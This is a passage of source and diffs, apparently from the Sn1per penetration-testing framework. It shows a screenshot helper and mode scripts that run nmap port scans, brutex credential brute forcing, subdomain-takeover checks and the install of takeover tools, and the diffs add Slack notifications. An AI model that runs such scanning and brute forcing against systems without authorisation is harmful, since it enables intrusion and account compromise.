final_uri_http_port = int(matches['port']) if 'port' in matches.keys() else 80
|
||||
final_uri_http = '%s://%s:%s' % ('http', host, final_uri_http_port)
|
||||
target_list.append(final_uri_http)
|
||||
logger_gen.info("'%s' has been formatted as '%s' with supplied overriding options" % (line, final_uri_http))
|
||||
|
||||
|
||||
final_uri_https_port = int(matches['port']) if 'port' in matches.keys() else 443
|
||||
final_uri_https = '%s://%s:%s' % ('https', host, final_uri_https_port)
|
||||
target_list.append(final_uri_https)
|
||||
logger_gen.info("'%s' has been formatted as '%s' with supplied overriding options" % (line, final_uri_https))
|
||||
|
||||
else:
|
||||
final_uri = '%s://%s:%s' % (protocol, host, port)
|
||||
final_uri = final_uri + '/%s' % res if res != None else final_uri
|
||||
target_list.append(final_uri)
|
||||
|
||||
logger_gen.info("'%s' has been formatted as '%s' with supplied overriding options" % (line, final_uri))
|
||||
|
||||
return target_list
|
||||
|
||||
def craft_cmd(url_and_options):
|
||||
"""
|
||||
Craft the correct command with url and options
|
||||
"""
|
||||
global logger_output, PHANTOMJS_BIN, WEBSCREENSHOT_JS, SCREENSHOTS_DIRECTORY, SHELL_EXECUTION_OK, SHELL_EXECUTION_ERROR
|
||||
|
||||
url, options = url_and_options
|
||||
|
||||
logger_url = logging.getLogger("%s" % url)
|
||||
logger_url.addHandler(logger_output)
|
||||
logger_url.setLevel(options.log_level)
|
||||
|
||||
#output_filename = os.path.join(SCREENSHOTS_DIRECTORY, ('%s.png' % filter_bad_filename_chars(url)))
|
||||
output_filename = os.path.join(SCREENSHOTS_DIRECTORY, ('%s.jpg' % filter_bad_filename_chars(url)))
|
||||
|
||||
# PhantomJS renderer
|
||||
if options.renderer == 'phantomjs':
|
||||
# If you ever want to add some voodoo options to the phantomjs command to be executed, that's here right below
|
||||
cmd_parameters = [ PHANTOMJS_BIN,
|
||||
'--ignore-ssl-errors true',
|
||||
'--ssl-protocol any',
|
||||
'--ssl-ciphers ALL'
|
||||
]
|
||||
|
||||
cmd_parameters.append("--proxy %s" % options.proxy) if options.proxy != None else None
|
||||
cmd_parameters.append("--proxy-auth %s" % options.proxy_auth) if options.proxy_auth != None else None
|
||||
cmd_parameters.append("--proxy-type %s" % options.proxy_type) if options.proxy_type != None else None
|
||||
|
||||
cmd_parameters.append('"%s" url_capture="%s" output_file="%s"' % (WEBSCREENSHOT_JS, url, output_filename))
|
||||
|
||||
cmd_parameters.append('header="Cookie: %s"' % options.cookie.rstrip(';')) if options.cookie != None else None
|
||||
|
||||
cmd_parameters.append('http_username="%s"' % options.http_username) if options.http_username != None else None
|
||||
cmd_parameters.append('http_password="%s"' % options.http_password) if options.http_password != None else None
|
||||
|
||||
if options.header:
|
||||
for header in options.header:
|
||||
cmd_parameters.append('header="%s"' % header.rstrip(';'))
|
||||
|
||||
# Chrome and chromium renderers
|
||||
else:
|
||||
cmd_parameters = [ CHROME_BIN ] if options.renderer == 'chrome' else [ CHROMIUM_BIN ]
|
||||
cmd_parameters += [ '--allow-running-insecure-content',
|
||||
'--ignore-certificate-errors',
|
||||
'--ignore-urlfetcher-cert-requests',
|
||||
'--reduce-security-for-testing',
|
||||
'--no-sandbox',
|
||||
'--headless',
|
||||
'--disable-gpu',
|
||||
'--hide-scrollbars',
|
||||
'--incognito',
|
||||
'-screenshot="%s"' % output_filename,
|
||||
'--window-size=1200,800',
|
||||
'"%s"' % url
|
||||
]
|
||||
cmd_parameters.append('--proxy-server="%s"' % options.proxy) if options.proxy != None else None
|
||||
|
||||
cmd = " ".join(cmd_parameters)
|
||||
|
||||
logger_url.debug("Shell command to be executed\n'%s'\n" % cmd)
|
||||
|
||||
execution_retval = shell_exec(url, cmd, options)
|
||||
|
||||
return execution_retval, url
|
||||
|
||||
|
||||
def take_screenshot(url_list, options):
|
||||
"""
|
||||
Launch the screenshot workers
|
||||
Thanks http://noswap.com/blog/python-multiprocessing-keyboardinterrupt
|
||||
"""
|
||||
global SHELL_EXECUTION_OK, SHELL_EXECUTION_ERROR
|
||||
|
||||
screenshot_number = len(url_list)
|
||||
print "[+] %s URLs to be screenshot" % screenshot_number
|
||||
|
||||
pool = multiprocessing.Pool(processes=int(options.workers), initializer=init_worker)
|
||||
|
||||
taken_screenshots = [r for r in pool.imap(func=craft_cmd, iterable=itertools.izip(url_list, itertools.repeat(options)))]
|
||||
|
||||
screenshots_error_url = [url for retval, url in taken_screenshots if retval == SHELL_EXECUTION_ERROR]
|
||||
screenshots_error = sum(retval == SHELL_EXECUTION_ERROR for retval, url in taken_screenshots)
|
||||
screenshots_ok = int(screenshot_number - screenshots_error)
|
||||
|
||||
print "[+] %s actual URLs screenshot" % screenshots_ok
|
||||
print "[+] %s error(s)" % screenshots_error
|
||||
|
||||
if screenshots_error != 0:
|
||||
for url in screenshots_error_url:
|
||||
print " %s" % url
|
||||
|
||||
return None
|
||||
|
||||
def main():
|
||||
"""
|
||||
Dat main
|
||||
"""
|
||||
global VERSION, SCREENSHOTS_DIRECTORY, LOGLEVELS
|
||||
signal.signal(signal.SIGINT, kill_em_all)
|
||||
|
||||
print 'webscreenshot.py version %s\n' % VERSION
|
||||
|
||||
options, arguments = parser.parse_args()
|
||||
|
||||
try :
|
||||
options.log_level = LOGLEVELS[options.verbosity]
|
||||
logger_gen.setLevel(options.log_level)
|
||||
except :
|
||||
parser.error("Please specify a valid log level")
|
||||
|
||||
if (options.input_file == None and (len(arguments) > 1 or len(arguments) == 0)):
|
||||
parser.error('Please specify a valid input file or a valid URL')
|
||||
|
||||
if (options.input_file != None and len(arguments) == 1):
|
||||
parser.error('Please specify either an input file or an URL')
|
||||
|
||||
if (options.output_directory != None):
|
||||
SCREENSHOTS_DIRECTORY = os.path.abspath(os.path.join(os.getcwdu(), options.output_directory))
|
||||
|
||||
logger_gen.debug("Options: %s\n" % options)
|
||||
if not os.path.exists(SCREENSHOTS_DIRECTORY):
|
||||
logger_gen.info("'%s' does not exist, will then be created" % SCREENSHOTS_DIRECTORY)
|
||||
os.makedirs(SCREENSHOTS_DIRECTORY)
|
||||
|
||||
url_list = parse_targets(options, arguments)
|
||||
|
||||
take_screenshot(url_list, options)
|
||||
|
||||
return None
|
||||
|
||||
if __name__ == "__main__" :
|
||||
main()
|
||||
|
|
@ -86,6 +86,7 @@ pip install webtech
|
|||
mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR
|
||||
unzip slurp.zip
|
||||
rm -f slurp.zip
|
||||
cd ~/go/bin/;go get github.com/haccer/subjack
|
||||
cd ~/go/bin/;go get -u github.com/Ice3man543/SubOver; mv SubOver /usr/local/bin/subover
|
||||
cd ~/go/bin;go get -u github.com/OWASP/Amass/cmd/amass; mv amass /usr/local/bin/
|
||||
cd ~/go/bin;go get -u github.com/subfinder/subfinder; mv subfinder /usr/local/bin/subfinder
|
||||
|
|
|
|||
|
|
@ -59,11 +59,16 @@ if [ "$MODE" = "airstrike" ]; then
|
|||
echo -e "$OKRED __________________________________________________________"
|
||||
echo -e "$RESET"
|
||||
if [ ! -z "$WORKSPACE_DIR" ]; then
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
else
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
fi
|
||||
args=""
|
||||
done
|
||||
|
|
@ -71,5 +76,8 @@ if [ "$MODE" = "airstrike" ]; then
|
|||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
fi
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
exit
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -6,6 +6,9 @@ else
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running brute force: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
brutex $TARGET | tee $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/credentials/brutex-$TARGET 2> /dev/null > $LOOT_DIR/credentials/brutex-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/credentials/brutex-$TARGET
|
||||
|
|
@ -13,4 +16,7 @@ else
|
|||
rm -f hydra.restore
|
||||
rm -f scan.log
|
||||
echo ""
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished brute force: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
fi
|
||||
|
|
@ -15,8 +15,12 @@ if [ "$MODE" = "discover" ]; then
|
|||
mkdir $LOOT_DIR/scans 2> /dev/null
|
||||
fi
|
||||
OUT_FILE=$(echo "$TARGET" | tr / -)
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUTFILE-$MODE.txt 2> /dev/null
|
||||
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
echo -e "$OKRED ____ /\\"
|
||||
|
|
@ -43,7 +47,6 @@ if [ "$MODE" = "discover" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
#nmap -T4 -v -sC -sA -sV -F $TARGET 2>/dev/null | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null
|
||||
nmap -T4 -v -p $QUICK_PORTS -sS $TARGET 2> /dev/null | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null
|
||||
cat $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -58,7 +61,9 @@ if [ "$MODE" = "discover" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
#loot
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE
|
||||
exit
|
||||
fi
|
||||
148
modes/flyover.sh
148
modes/flyover.sh
|
|
@ -20,9 +20,7 @@ if [ "$MODE" = "flyover" ]; then
|
|||
mkdir $WORKSPACE_DIR/output 2> /dev/null
|
||||
fi
|
||||
|
||||
args="$args -m flyover --noreport --noloot"
|
||||
TARGET="$a"
|
||||
args="$args -f $FILE"
|
||||
args="$args -f $FILE -m flyover --noreport --noloot"
|
||||
echo -e "$OKRED "
|
||||
echo -e "$OKRED . . "
|
||||
echo -e "$OKRED // "'\\\\ '
|
||||
|
|
@ -37,91 +35,75 @@ if [ "$MODE" = "flyover" ]; then
|
|||
echo -e "$OKRED UUU UUU UUU "
|
||||
echo -e "$OKRED "
|
||||
echo -e "$RESET"
|
||||
|
||||
if [ ! -z "$WORKSPACE_DIR" ]; then
|
||||
echo "sniper -f $FILE -m $MODE --noreport $args" >> $LOOT_DIR/scans/$WORKSPACE-$MODE.txt
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$WORKSPACE-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
else
|
||||
echo "sniper -f $FILE -m $MODE --noreport $args" >> $LOOT_DIR/scans/$WORKSPACE-$MODE.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$WORKSPACE-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
echo "sniper -f $FILE -m $MODE --noreport $args" >> $LOOT_DIR/scans/$WORKSPACE-$MODE.txt
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$WORKSPACE-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python /usr/share/sniper/bin/slack.py "Starting scan: $FILE $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
|
||||
args=""
|
||||
fi
|
||||
|
||||
i=1
|
||||
for HOST in `sort -u $FILE`; do
|
||||
TARGET="$HOST"
|
||||
|
||||
touch $LOOT_DIR/scans/$TARGET-$MODE.txt 2> /dev/null
|
||||
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
echo -e "$OKRED=====================================================================================$RESET"
|
||||
echo -e "${OKBLUE}HOST:$RESET $TARGET"
|
||||
|
||||
dig all +short $TARGET 2> /dev/null > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
|
||||
dig all +short -x $TARGET 2> /dev/null >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
|
||||
dig A +short $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null &
|
||||
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
|
||||
|
||||
curl --connect-timeout 3 -I -s -R http://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null &
|
||||
curl --connect-timeout 3 -I -s -R https://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null &
|
||||
|
||||
webtech -u http://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-http.txt 2> /dev/null &
|
||||
webtech -u https://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-https.txt 2> /dev/null &
|
||||
|
||||
nmap -sS -T5 --open -Pn -p $QUICK_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null &
|
||||
|
||||
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null
|
||||
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null &
|
||||
/bin/CutyCapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null &
|
||||
else
|
||||
cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null &
|
||||
cutycapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null &
|
||||
fi
|
||||
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
|
||||
i=$((i+1))
|
||||
if [ "$i" -gt "20" ]; then
|
||||
i=0
|
||||
sleep 2
|
||||
fi
|
||||
done
|
||||
|
||||
sort -u $LOOT_DIR/domains/targets.txt 2>/dev/null >> $LOOT_DIR/domains/domains-all-sorted.txt
|
||||
sort -u LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
|
||||
sleep 20
|
||||
rm -f $INSTALL_DIR/wget-log* 2> /dev/null
|
||||
echo -e "$OKRED=====================================================================================$RESET"
|
||||
|
||||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
exit
|
||||
else
|
||||
for HOST in `sort -u $LOOT_DIR/domains/domains-all-sorted.txt $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null`; do
|
||||
i=1
|
||||
for HOST in `cat $FILE`; do
|
||||
TARGET="$HOST"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
touch $LOOT_DIR/scans/$TARGET-$MODE.txt 2> /dev/null
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
echo -e "$OKRED=====================================================================================$RESET"
|
||||
echo -e "${OKBLUE}HOST:$RESET $TARGET"
|
||||
echo -e "${OKBLUE}DNS:$RESET `cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null`"
|
||||
echo -e "${OKBLUE}TAKEOVERS:$RESET ${OKRED}" && cat $LOOT_DIR/nmap/takeovers-$TARGET.txt 2> /dev/null
|
||||
echo -en "${OKBLUE}TITLE:$RESET ${OKORANGE}" && cat $LOOT_DIR/web/title-htt*-$TARGET.txt 2> /dev/null
|
||||
echo "-"
|
||||
echo -e "${OKBLUE}HEADERS:$RESET"
|
||||
cat $LOOT_DIR/web/headers-htt*-$TARGET.txt 2> /dev/null
|
||||
echo -en "${OKBLUE}PORTS:$RESET "
|
||||
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2`; do
|
||||
echo -n "$PORT "
|
||||
done
|
||||
echo ""
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
done
|
||||
fi
|
||||
|
||||
sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
|
||||
dig all +short $TARGET 2> /dev/null > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
|
||||
dig all +short -x $TARGET 2> /dev/null >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
|
||||
host $TARGET 2> /dev/null | grep address 2> /dev/null | awk '{print $4}' 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null &
|
||||
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
|
||||
|
||||
curl --connect-timeout 5 -I -s -R http://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null &
|
||||
curl --connect-timeout 5 -I -s -R https://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null &
|
||||
|
||||
webtech -u http://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-http.txt 2> /dev/null &
|
||||
webtech -u https://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-https.txt 2> /dev/null &
|
||||
|
||||
nmap -sS -T5 --open -Pn -p $QUICK_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null &
|
||||
|
||||
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null
|
||||
|
||||
if [ $CUTYCAPT = "1" ]; then
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null &
|
||||
/bin/CutyCapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null &
|
||||
else
|
||||
cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null &
|
||||
cutycapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null &
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ $WEBSCREENSHOT = "1" ]; then
|
||||
cd $LOOT_DIR
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:80 2> /dev/null > /dev/null &
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:443 2> /dev/null > /dev/null &
|
||||
fi
|
||||
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
|
||||
i=$((i+1))
|
||||
if [ "$i" -gt "$THREADS" ]; then
|
||||
i=1
|
||||
sleep 15
|
||||
fi
|
||||
|
||||
done
|
||||
sleep 15
|
||||
sort -u LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
|
||||
rm -f $INSTALL_DIR/wget-log* 2> /dev/null
|
||||
killall webtech 2> /dev/null
|
||||
echo -e "$OKRED=====================================================================================$RESET"
|
||||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
fi
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $FILE $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
fi
|
||||
exit
|
||||
fi
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -17,14 +17,21 @@ if [ "$MODE" = "fullportonly" ]; then
|
|||
mkdir $LOOT_DIR/output 2> /dev/null
|
||||
fi
|
||||
args="$args --noreport -m fullportonly"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-fullnmapscan.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
|
||||
logo
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
if [ -z "$PORT" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
cp -f $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
|
|
@ -33,21 +40,21 @@ if [ "$MODE" = "fullportonly" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -sU -sV -A -T4 -v -p $DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml
|
||||
nmap -Pn -sU -sV -A -T4 -v -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml -p $DEFAULT_UDP_PORTS $TARGET
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null
|
||||
else
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -A -v -sV -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
nmap -Pn -A -v -sV -T4 -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -A -v -sV -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp-port$PORT.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
|
||||
nmap -Pn -A -v -sV -T4 -sU -p $PORT -Pn -oX $LOOT_DIR/nmap/nmap-$TARGET-udp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
|
||||
